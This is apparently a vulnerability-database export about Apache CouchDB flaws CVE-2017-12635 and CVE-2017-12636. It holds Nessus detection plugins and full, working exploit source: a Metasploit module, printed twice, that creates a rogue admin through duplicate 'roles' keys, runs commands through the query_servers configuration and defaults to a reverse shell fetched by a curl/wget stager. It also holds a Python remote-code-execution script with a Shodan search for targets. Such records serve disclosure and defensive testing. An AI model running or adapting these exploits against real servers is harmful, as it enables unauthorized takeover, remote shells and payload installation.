an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"SMB/MS_Bulletin_Checks/Possible\");\n\nbulletin = \"MS18-10\";\nkbs = make_list('4462919');\n\nif (get_kb_item(\"Host/patch_management_checks\")) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nget_kb_item_or_exit(\"SMB/WindowsVersion\", exit_code:1);\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:\"10\",\n sp:0,\n os_build:\"17134\",\n rollup_date:\"10_2018\",\n bulletin:bulletin,\n rollup_kb_list:[4462919])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-11-01T02:37:11", "bulletinFamily": "scanner", "description": "Apache CouchDB PMC reports :\n\nDatabase Administrator could achieve privilege escalation to the\naccount that CouchDB runs under, by abusing insufficient validation in\nthe HTTP API, escaping security controls implemented in previous\nreleases.", "modified": "2019-11-02T00:00:00", "id": "FREEBSD_PKG_1E54D140849311E8A7950028F8D09152.NASL", "href": "https://www.tenable.com/plugins/nessus/111018", "published": "2018-07-12T00:00:00", "title": "FreeBSD : couchdb -- multiple vulnerabilities (1e54d140-8493-11e8-a795-0028f8d09152)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the FreeBSD VuXML database :\n#\n# Copyright 2003-2018 Jacques Vidrine and contributors\n#\n# Redistribution and use in source (VuXML) and 'compiled' forms (SGML,\n# HTML, PDF, PostScript, RTF and so forth) with or without modification,\n# are permitted provided that the following conditions are met:\n# 1. Redistributions of source code (VuXML) must retain the above\n# copyright notice, this list of conditions and the following\n# disclaimer as the first lines of this file unmodified.\n# 2. Redistributions in compiled form (transformed to other DTDs,\n# published online in any format, converted to PDF, PostScript,\n# RTF and other formats) must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer\n# in the documentation and/or other materials provided with the\n# distribution.\n# \n# THIS DOCUMENTATION IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,\n# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR\n# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS\n# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,\n# OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT\n# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR\n# BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,\n# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE\n# OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS DOCUMENTATION,\n# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(111018);\n script_version(\"1.5\");\n script_cvs_date(\"Date: 2019/04/05 23:25:06\");\n\n script_cve_id(\"CVE-2017-12635\", \"CVE-2017-12636\", \"CVE-2018-8007\");\n\n script_name(english:\"FreeBSD : couchdb -- multiple vulnerabilities (1e54d140-8493-11e8-a795-0028f8d09152)\");\n script_summary(english:\"Checks for updated package in pkg_info output\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote FreeBSD host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Apache CouchDB PMC reports :\n\nDatabase Administrator could achieve privilege escalation to the\naccount that CouchDB runs under, by abusing insufficient validation in\nthe HTTP API, escaping security controls implemented in previous\nreleases.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://blog.couchdb.org/2018/07/10/cve-2018-8007/\"\n );\n # https://blog.couchdb.org/2017/11/14/apache-couchdb-cve-2017-12635-and-cve-2017-12636/\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?236d3194\"\n );\n # https://lists.apache.org/thread.html/6fa798e96686b7b0013ec2088140d00aeb7d34487d3f5ad032af6934@%3Cdev.couchdb.apache.org%3E\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?aab45713\"\n );\n # https://vuxml.freebsd.org/freebsd/1e54d140-8493-11e8-a795-0028f8d09152.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?df4f4901\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Apache CouchDB Arbitrary Command Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:couchdb\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:freebsd:freebsd\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/11/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/07/10\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/07/12\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2018-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"FreeBSD Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/FreeBSD/release\", \"Host/FreeBSD/pkg_info\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"freebsd_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/FreeBSD/release\")) audit(AUDIT_OS_NOT, \"FreeBSD\");\nif (!get_kb_item(\"Host/FreeBSD/pkg_info\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (pkg_test(save_report:TRUE, pkg:\"couchdb<1.7.2,2\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:pkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "zdt": [{"lastseen": "2018-07-13T03:59:12", "bulletinFamily": "exploit", "description": "CouchDB administrative users can configure the database server via HTTP(S). Some of the configuration options include paths for operating system-level binaries that are subsequently launched by CouchDB. This allows an admin user in Apache CouchDB before 1.7.0 and 2.x before 2.1.1 to execute arbitrary shell commands as the CouchDB user, including downloading and executing scripts from the public internet.", "modified": "2018-07-13T00:00:00", "published": "2018-07-13T00:00:00", "id": "1337DAY-ID-30713", "href": "https://0day.today/exploit/description/30713", "title": "Apache #CouchDB Arbitrary Command Execution Exploit", "type": "zdt", "sourceData": "##\r\n# This module requires Metasploit: https://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nclass MetasploitModule < Msf::Exploit::Remote\r\n\r\n Rank = ExcellentRanking\r\n\r\n include Msf::Exploit::Remote::HttpClient\r\n include Msf::Exploit::CmdStager\r\n include Msf::Exploit::FileDropper\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'Apache CouchDB Arbitrary Command Execution',\r\n 'Description' => %q{\r\n CouchDB administrative users can configure the database server via HTTP(S).\r\n Some of the configuration options include paths for operating system-level binaries that are subsequently launched by CouchDB.\r\n This allows an admin user in Apache CouchDB before 1.7.0 and 2.x before 2.1.1 to execute arbitrary shell commands as the CouchDB user,\r\n including downloading and executing scripts from the public internet.\r\n },\r\n 'Author' => [\r\n 'Max Justicz', # CVE-2017-12635 Vulnerability discovery\r\n 'Joan Touzet', # CVE-2017-12636 Vulnerability discovery\r\n 'Green-m <greenm.xxoo[at]gmail.com>' # Metasploit module\r\n ],\r\n 'References' => [\r\n ['CVE', '2017-12636'],\r\n ['CVE', '2017-12635'],\r\n ['URL', 'https://justi.cz/security/2017/11/14/couchdb-rce-npm.html'],\r\n ['URL', 'http://docs.couchdb.org/en/latest/cve/2017-12636.html'],\r\n ['URL', 'https://lists.apache.org/thread.html/[email\u00a0protected]%3Cdev.couchdb.apache.org%3E']\r\n ],\r\n 'DisclosureDate' => 'Apr 6 2016',\r\n 'License' => MSF_LICENSE,\r\n 'Platform' => 'linux',\r\n 'Arch' => [ARCH_X86, ARCH_X64],\r\n 'Privileged' => false,\r\n 'DefaultOptions' => {\r\n 'PAYLOAD' => 'linux/x64/shell_reverse_tcp',\r\n 'CMDSTAGER::FLAVOR' => 'curl'\r\n },\r\n 'CmdStagerFlavor' => ['curl', 'wget'],\r\n 'Targets' => [\r\n ['Automatic', {}],\r\n ['Apache CouchDB version 1.x', {}],\r\n ['Apache CouchDB version 2.x', {}]\r\n ],\r\n 'DefaultTarget' => 0\r\n ))\r\n\r\n register_options([\r\n Opt::RPORT(5984),\r\n OptString.new('URIPATH', [false, 'The URI to use for this exploit to download and execute. (default is random)']),\r\n OptString.new('HttpUsername', [false, 'The username to login as']),\r\n OptString.new('HttpPassword', [false, 'The password to login with'])\r\n ])\r\n\r\n register_advanced_options([\r\n OptInt.new('Attempts', [false, 'The number of attempts to execute the payload.']),\r\n OptString.new('WritableDir', [true, 'Writable directory to write temporary payload on disk.', '/tmp'])\r\n ])\r\n end\r\n\r\n def check\r\n get_version\r\n version = Gem::Version.new(@version)\r\n return CheckCode::Unknown if version.version.empty?\r\n vprint_status \"Found CouchDB version #{version}\"\r\n\r\n return CheckCode::Appears if version < Gem::Version.new('1.7.0') || version.between?(Gem::Version.new('2.0.0'), Gem::Version.new('2.1.0'))\r\n\r\n CheckCode::Safe\r\n end\r\n\r\n def exploit\r\n fail_with(Failure::Unknown, \"Something went horribly wrong and we couldn't continue to exploit.\") unless get_version\r\n version = @version\r\n\r\n vprint_good(\"#{peer} - Authorization bypass successful\") if auth_bypass\r\n\r\n print_status(\"Generating #{datastore['CMDSTAGER::FLAVOR']} command stager\")\r\n @cmdstager = generate_cmdstager(\r\n temp: datastore['WritableDir'],\r\n file: File.basename(cmdstager_path)\r\n ).join(';')\r\n\r\n register_file_for_cleanup(cmdstager_path)\r\n\r\n if !datastore['Attempts'] || datastore['Attempts'] <= 0\r\n attempts = 1\r\n else\r\n attempts = datastore['Attempts']\r\n end\r\n\r\n attempts.times do |i|\r\n print_status(\"#{peer} - The #{i + 1} time to exploit\")\r\n send_payload(version)\r\n Rex.sleep(5)\r\n # break if we get the shell\r\n break if session_created?\r\n end\r\n end\r\n\r\n # CVE-2017-12635\r\n # The JSON parser differences result in behaviour that if two 'roles' keys are available in the JSON,\r\n # the second one will be used for authorising the document write, but the first 'roles' key is used for subsequent authorization\r\n # for the newly created user.\r\n def auth_bypass\r\n username = datastore['HttpUsername'] || Rex::Text.rand_text_alpha_lower(4..12)\r\n password = datastore['HttpPassword'] || Rex::Text.rand_text_alpha_lower(4..12)\r\n @auth = basic_auth(username, password)\r\n\r\n res = send_request_cgi(\r\n 'uri' => normalize_uri(target_uri.path, \"/_users/org.couchdb.user:#{username}\"),\r\n 'method' => 'PUT',\r\n 'ctype' => 'application/json',\r\n 'data' => %({\"type\": \"user\",\"name\": \"#{username}\",\"roles\": [\"_admin\"],\"roles\": [],\"password\": \"#{password}\"})\r\n )\r\n\r\n if res && (res.code == 200 || res.code == 201) && res.get_json_document['ok']\r\n return true\r\n else\r\n return false\r\n end\r\n end\r\n\r\n def get_version\r\n @version = nil\r\n\r\n begin\r\n res = send_request_cgi(\r\n 'uri' => normalize_uri(target_uri.path),\r\n 'method' => 'GET',\r\n 'authorization' => @auth\r\n )\r\n rescue Rex::ConnectionError\r\n vprint_bad(\"#{peer} - Connection failed\")\r\n return false\r\n end\r\n\r\n unless res\r\n vprint_bad(\"#{peer} - No response, check if it is CouchDB. \")\r\n return false\r\n end\r\n\r\n if res && res.code == 401\r\n print_bad(\"#{peer} - Authentication required.\")\r\n return false\r\n end\r\n\r\n if res && res.code == 200\r\n res_json = res.get_json_document\r\n\r\n if res_json.empty?\r\n vprint_bad(\"#{peer} - Cannot parse the response, seems like it's not CouchDB.\")\r\n return false\r\n end\r\n\r\n @version = res_json['version'] if res_json['version']\r\n return true\r\n end\r\n\r\n vprint_warning(\"#{peer} - Version not found\")\r\n return true\r\n end\r\n\r\n def send_payload(version)\r\n vprint_status(\"#{peer} - CouchDB version is #{version}\") if version\r\n\r\n version = Gem::Version.new(@version)\r\n if version.version.empty?\r\n vprint_warning(\"#{peer} - Cannot retrieve the version of CouchDB.\")\r\n # if target set Automatic, exploit failed.\r\n if target == targets[0]\r\n fail_with(Failure::NoTarget, \"#{peer} - Couldn't retrieve the version automaticly, set the target manually and try again.\")\r\n elsif target == targets[1]\r\n payload1\r\n elsif target == targets[2]\r\n payload2\r\n end\r\n elsif version < Gem::Version.new('1.7.0')\r\n payload1\r\n elsif version.between?(Gem::Version.new('2.0.0'), Gem::Version.new('2.1.0'))\r\n payload2\r\n elsif version >= Gem::Version.new('1.7.0') || Gem::Version.new('2.1.0')\r\n fail_with(Failure::NotVulnerable, \"#{peer} - The target is not vulnerable.\")\r\n end\r\n end\r\n\r\n # Exploit with multi requests\r\n # payload1 is for the version of couchdb below 1.7.0\r\n def payload1\r\n rand_cmd1 = Rex::Text.rand_text_alpha_lower(4..12)\r\n rand_cmd2 = Rex::Text.rand_text_alpha_lower(4..12)\r\n rand_db = Rex::Text.rand_text_alpha_lower(4..12)\r\n rand_doc = Rex::Text.rand_text_alpha_lower(4..12)\r\n rand_hex = Rex::Text.rand_text_hex(32)\r\n rand_file = \"#{datastore['WritableDir']}/#{Rex::Text.rand_text_alpha_lower(8..16)}\"\r\n\r\n register_file_for_cleanup(rand_file)\r\n\r\n send_request_cgi(\r\n 'uri' => normalize_uri(target_uri.path, \"/_config/query_servers/#{rand_cmd1}\"),\r\n 'method' => 'PUT',\r\n 'authorization' => @auth,\r\n 'data' => %(\"echo '#{@cmdstager}' > #{rand_file}\")\r\n )\r\n\r\n send_request_cgi(\r\n 'uri' => normalize_uri(target_uri.path, \"/#{rand_db}\"),\r\n 'method' => 'PUT',\r\n 'authorization' => @auth\r\n )\r\n\r\n send_request_cgi(\r\n 'uri' => normalize_uri(target_uri.path, \"/#{rand_db}/#{rand_doc}\"),\r\n 'method' => 'PUT',\r\n 'authorization' => @auth,\r\n 'data' => %({\"_id\": \"#{rand_hex}\"})\r\n )\r\n\r\n send_request_cgi(\r\n 'uri' => normalize_uri(target_uri.path, \"/#{rand_db}/_temp_view?limit=20\"),\r\n 'method' => 'POST',\r\n 'authorization' => @auth,\r\n 'ctype' => 'application/json',\r\n 'data' => %({\"language\":\"#{rand_cmd1}\",\"map\":\"\"})\r\n )\r\n\r\n send_request_cgi(\r\n 'uri' => normalize_uri(target_uri.path, \"/_config/query_servers/#{rand_cmd2}\"),\r\n 'method' => 'PUT',\r\n 'authorization' => @auth,\r\n 'data' => %(\"/bin/sh #{rand_file}\")\r\n )\r\n\r\n send_request_cgi(\r\n 'uri' => normalize_uri(target_uri.path, \"/#{rand_db}/_temp_view?limit=20\"),\r\n 'method' => 'POST',\r\n 'authorization' => @auth,\r\n 'ctype' => 'application/json',\r\n 'data' => %({\"language\":\"#{rand_cmd2}\",\"map\":\"\"})\r\n )\r\n end\r\n\r\n # payload2 is for the version of couchdb below 2.1.1\r\n def payload2\r\n rand_cmd1 = Rex::Text.rand_text_alpha_lower(4..12)\r\n rand_cmd2 = Rex::Text.rand_text_alpha_lower(4..12)\r\n rand_db = Rex::Text.rand_text_alpha_lower(4..12)\r\n rand_doc = Rex::Text.rand_text_alpha_lower(4..12)\r\n rand_tmp = Rex::Text.rand_text_alpha_lower(4..12)\r\n rand_hex = Rex::Text.rand_text_hex(32)\r\n rand_file = \"#{datastore['WritableDir']}/#{Rex::Text.rand_text_alpha_lower(8..16)}\"\r\n\r\n register_file_for_cleanup(rand_file)\r\n\r\n res = send_request_cgi(\r\n 'uri' => normalize_uri(target_uri.path, \"/_membership\"),\r\n 'method' => 'GET',\r\n 'authorization' => @auth\r\n )\r\n\r\n node = res.get_json_document['all_nodes'][0]\r\n\r\n send_request_cgi(\r\n 'uri' => normalize_uri(target_uri.path, \"/_node/#{node}/_config/query_servers/#{rand_cmd1}\"),\r\n 'method' => 'PUT',\r\n 'authorization' => @auth,\r\n 'data' => %(\"echo '#{@cmdstager}' > #{rand_file}\")\r\n )\r\n\r\n send_request_cgi(\r\n 'uri' => normalize_uri(target_uri.path, \"/#{rand_db}\"),\r\n 'method' => 'PUT',\r\n 'authorization' => @auth\r\n )\r\n\r\n send_request_cgi(\r\n 'uri' => normalize_uri(target_uri.path, \"/#{rand_db}/#{rand_doc}\"),\r\n 'method' => 'PUT',\r\n 'authorization' => @auth,\r\n 'data' => %({\"_id\": \"#{rand_hex}\"})\r\n )\r\n\r\n send_request_cgi(\r\n 'uri' => normalize_uri(target_uri.path, \"/#{rand_db}/_design/#{rand_tmp}\"),\r\n 'method' => 'PUT',\r\n 'authorization' => @auth,\r\n 'ctype' => 'application/json',\r\n 'data' => %({\"_id\":\"_design/#{rand_tmp}\",\"views\":{\"#{rand_db}\":{\"map\":\"\"} },\"language\":\"#{rand_cmd1}\"})\r\n )\r\n\r\n send_request_cgi(\r\n 'uri' => normalize_uri(target_uri.path, \"/_node/#{node}/_config/query_servers/#{rand_cmd2}\"),\r\n 'method' => 'PUT',\r\n 'authorization' => @auth,\r\n 'data' => %(\"/bin/sh #{rand_file}\")\r\n )\r\n\r\n send_request_cgi(\r\n 'uri' => normalize_uri(target_uri.path, \"/#{rand_db}/_design/#{rand_tmp}\"),\r\n 'method' => 'PUT',\r\n 'authorization' => @auth,\r\n 'ctype' => 'application/json',\r\n 'data' => %({\"_id\":\"_design/#{rand_tmp}\",\"views\":{\"#{rand_db}\":{\"map\":\"\"} },\"language\":\"#{rand_cmd2}\"})\r\n )\r\n end\r\n\r\n def cmdstager_path\r\n @cmdstager_path ||=\r\n \"#{datastore['WritableDir']}/#{Rex::Text.rand_text_alpha_lower(8)}\"\r\n end\r\n\r\nend\n\n# 0day.today [2018-07-13] #", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://0day.today/exploit/30713"}, {"lastseen": "2018-06-20T19:45:59", "bulletinFamily": "exploit", "description": "Exploit for linux platform in category web applications", "modified": "2018-06-20T00:00:00", "published": "2018-06-20T00:00:00", "id": "1337DAY-ID-30608", "href": "https://0day.today/exploit/description/30608", "title": "Apache CouchDB < 2.1.0 - Remote Code Execution Exploit", "type": "zdt", "sourceData": "# Title: Apache CouchDB < 2.1.0 - Remote Code Execution\r\n# Author: Cody Zacharias\r\n# Shodan Dork: port:5984\r\n# Vendor Homepage: http://couchdb.apache.org/\r\n# Software Link: http://archive.apache.org/dist/couchdb/source/1.6.0/\r\n# Version: <= 1.7.0 and 2.x - 2.1.0\r\n# Tested on: Debian\r\n# CVE : CVE-2017-12636\r\n# References: \r\n# https://justi.cz/security/2017/11/14/couchdb-rce-npm.html\r\n# https://blog.trendmicro.com/trendlabs-security-intelligence/vulnerabilities-apache-couchdb-open-door-monero-miners/\r\n \r\n# Proof of Concept: python exploit.py --priv -c \"id\" http://localhost:5984\r\n \r\n#!/usr/bin/env python\r\nfrom requests.auth import HTTPBasicAuth\r\nimport argparse\r\nimport requests\r\nimport re\r\nimport sys\r\n \r\ndef getVersion():\r\n version = requests.get(args.host).json()[\"version\"]\r\n return version\r\n \r\ndef error(message):\r\n print(message)\r\n sys.exit(1)\r\n \r\ndef exploit(version):\r\n with requests.session() as session:\r\n session.headers = {\"Content-Type\": \"application/json\"}\r\n \r\n # Exploit privilege escalation\r\n if args.priv:\r\n try:\r\n payload = '{\"type\": \"user\", \"name\": \"'\r\n payload += args.user\r\n payload += '\", \"roles\": [\"_admin\"], \"roles\": [],'\r\n payload += '\"password\": \"' + args.password + '\"}'\r\n \r\n pr = session.put(args.host + \"/_users/org.couchdb.user:\" + args.user,\r\n data=payload)\r\n \r\n print(\"[+] User \" + args.user + \" with password \" + args.password + \" successfully created.\")\r\n except requests.exceptions.HTTPError:\r\n error(\"[-] Unable to create the user on remote host.\")\r\n \r\n session.auth = HTTPBasicAuth(args.user, args.password)\r\n \r\n # Create payload\r\n try:\r\n if version == 1:\r\n session.put(args.host + \"/_config/query_servers/cmd\",\r\n data='\"' + args.cmd + '\"')\r\n print(\"[+] Created payload at: \" + args.host + \"/_config/query_servers/cmd\")\r\n else:\r\n host = session.get(args.host + \"/_membership\").json()[\"all_nodes\"][0]\r\n session.put(args.host + \"/_node/\" + host + \"/_config/query_servers/cmd\",\r\n data='\"' + args.cmd + '\"')\r\n print(\"[+] Created payload at: \" + args.host + \"/_node/\" + host + \"/_config/query_servers/cmd\")\r\n except requests.exceptions.HTTPError as e:\r\n error(\"[-] Unable to create command payload: \" + e)\r\n \r\n try:\r\n session.put(args.host + \"/god\")\r\n session.put(args.host + \"/god/zero\", data='{\"_id\": \"HTP\"}')\r\n except requests.exceptions.HTTPError:\r\n error(\"[-] Unable to create database.\")\r\n \r\n # Execute payload\r\n try:\r\n if version == 1:\r\n session.post(args.host + \"/god/_temp_view?limit=10\",\r\n data='{\"language\": \"cmd\", \"map\": \"\"}')\r\n else:\r\n session.post(args.host + \"/god/_design/zero\",\r\n data='{\"_id\": \"_design/zero\", \"views\": {\"god\": {\"map\": \"\"} }, \"language\": \"cmd\"}')\r\n print(\"[+] Command executed: \" + args.cmd)\r\n except requests.exceptions.HTTPError:\r\n error(\"[-] Unable to execute payload.\")\r\n \r\n print(\"[*] Cleaning up.\")\r\n \r\n # Cleanup database\r\n try:\r\n session.delete(args.host + \"/god\")\r\n except requests.exceptions.HTTPError:\r\n error(\"[-] Unable to remove database.\")\r\n \r\n # Cleanup payload\r\n try:\r\n if version == 1:\r\n session.delete(args.host + \"/_config/query_servers/cmd\")\r\n else:\r\n host = session.get(args.host + \"/_membership\").json()[\"all_nodes\"][0]\r\n session.delete(args.host + \"/_node\" + host + \"/_config/query_servers/cmd\")\r\n except requests.exceptions.HTTPError:\r\n error(\"[-] Unable to remove payload.\")\r\n \r\ndef main():\r\n version = getVersion()\r\n print(\"[*] Detected CouchDB Version \" + version)\r\n vv = version.replace(\".\", \"\")\r\n v = int(version[0])\r\n if v == 1 and int(vv) <= 170:\r\n exploit(v)\r\n elif v == 2 and int(vv) < 211:\r\n exploit(v)\r\n else:\r\n print(\"[-] Version \" + version + \" not vulnerable.\")\r\n sys.exit(0)\r\n \r\nif __name__ == \"__main__\":\r\n ap = argparse.ArgumentParser(\r\n description=\"Apache CouchDB JSON Remote Code Execution Exploit (CVE-2017-12636)\")\r\n ap.add_argument(\"host\", help=\"URL (Example: http://127.0.0.1:5984).\")\r\n ap.add_argument(\"-c\", \"--cmd\", help=\"Command to run.\")\r\n ap.add_argument(\"--priv\", help=\"Exploit privilege escalation (CVE-2017-12635).\",\r\n action=\"store_true\")\r\n ap.add_argument(\"-u\", \"--user\", help=\"Admin username (Default: guest).\",\r\n default=\"guest\")\r\n ap.add_argument(\"-p\", \"--password\", help=\"Admin password (Default: guest).\",\r\n default=\"guest\")\r\n args = ap.parse_args()\r\n main()\n\n# 0day.today [2018-06-20] #", "cvss": {"score": 9.0, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://0day.today/exploit/30608"}], "exploitdb": [{"lastseen": "2018-07-13T19:08:44", "bulletinFamily": "exploit", "description": "Apache CouchDB - Arbitrary Command Execution (Metasploit). CVE-2017-12635,CVE-2017-12636. Remote exploit for Linux platform. Tags: Metasploit Framework (MSF)...", "modified": "2018-07-13T00:00:00", "published": "2018-07-13T00:00:00", "id": "EDB-ID:45019", "href": "https://www.exploit-db.com/exploits/45019/", "type": "exploitdb", "title": "Apache CouchDB - Arbitrary Command Execution (Metasploit)", "sourceData": "##\r\n# This module requires Metasploit: https://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nclass MetasploitModule < Msf::Exploit::Remote\r\n\r\n Rank = ExcellentRanking\r\n\r\n include Msf::Exploit::Remote::HttpClient\r\n include Msf::Exploit::CmdStager\r\n include Msf::Exploit::FileDropper\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'Apache CouchDB Arbitrary Command Execution',\r\n 'Description' => %q{\r\n CouchDB administrative users can configure the database server via HTTP(S).\r\n Some of the configuration options include paths for operating system-level binaries that are subsequently launched by CouchDB.\r\n This allows an admin user in Apache CouchDB before 1.7.0 and 2.x before 2.1.1 to execute arbitrary shell commands as the CouchDB user,\r\n including downloading and executing scripts from the public internet.\r\n },\r\n 'Author' => [\r\n 'Max Justicz', # CVE-2017-12635 Vulnerability discovery\r\n 'Joan Touzet', # CVE-2017-12636 Vulnerability discovery\r\n 'Green-m <greenm.xxoo[at]gmail.com>' # Metasploit module\r\n ],\r\n 'References' => [\r\n ['CVE', '2017-12636'],\r\n ['CVE', '2017-12635'],\r\n ['URL', 'https://justi.cz/security/2017/11/14/couchdb-rce-npm.html'],\r\n ['URL', 'http://docs.couchdb.org/en/latest/cve/2017-12636.html'],\r\n ['URL', 'https://lists.apache.org/thread.html/6c405bf3f8358e6314076be9f48c89a2e0ddf00539906291ebdf0c67@%3Cdev.couchdb.apache.org%3E']\r\n ],\r\n 'DisclosureDate' => 'Apr 6 2016',\r\n 'License' => MSF_LICENSE,\r\n 'Platform' => 'linux',\r\n 'Arch' => [ARCH_X86, ARCH_X64],\r\n 'Privileged' => false,\r\n 'DefaultOptions' => {\r\n 'PAYLOAD' => 'linux/x64/shell_reverse_tcp',\r\n 'CMDSTAGER::FLAVOR' => 'curl'\r\n },\r\n 'CmdStagerFlavor' => ['curl', 'wget'],\r\n 'Targets' => [\r\n ['Automatic', {}],\r\n ['Apache CouchDB version 1.x', {}],\r\n ['Apache CouchDB version 2.x', {}]\r\n ],\r\n 'DefaultTarget' => 0\r\n ))\r\n\r\n register_options([\r\n Opt::RPORT(5984),\r\n OptString.new('URIPATH', [false, 'The URI to use for this exploit to download and execute. (default is random)']),\r\n OptString.new('HttpUsername', [false, 'The username to login as']),\r\n OptString.new('HttpPassword', [false, 'The password to login with'])\r\n ])\r\n\r\n register_advanced_options([\r\n OptInt.new('Attempts', [false, 'The number of attempts to execute the payload.']),\r\n OptString.new('WritableDir', [true, 'Writable directory to write temporary payload on disk.', '/tmp'])\r\n ])\r\n end\r\n\r\n def check\r\n get_version\r\n version = Gem::Version.new(@version)\r\n return CheckCode::Unknown if version.version.empty?\r\n vprint_status \"Found CouchDB version #{version}\"\r\n\r\n return CheckCode::Appears if version < Gem::Version.new('1.7.0') || version.between?(Gem::Version.new('2.0.0'), Gem::Version.new('2.1.0'))\r\n\r\n CheckCode::Safe\r\n end\r\n\r\n def exploit\r\n fail_with(Failure::Unknown, \"Something went horribly wrong and we couldn't continue to exploit.\") unless get_version\r\n version = @version\r\n\r\n vprint_good(\"#{peer} - Authorization bypass successful\") if auth_bypass\r\n\r\n print_status(\"Generating #{datastore['CMDSTAGER::FLAVOR']} command stager\")\r\n @cmdstager = generate_cmdstager(\r\n temp: datastore['WritableDir'],\r\n file: File.basename(cmdstager_path)\r\n ).join(';')\r\n\r\n register_file_for_cleanup(cmdstager_path)\r\n\r\n if !datastore['Attempts'] || datastore['Attempts'] <= 0\r\n attempts = 1\r\n else\r\n attempts = datastore['Attempts']\r\n end\r\n\r\n attempts.times do |i|\r\n print_status(\"#{peer} - The #{i + 1} time to exploit\")\r\n 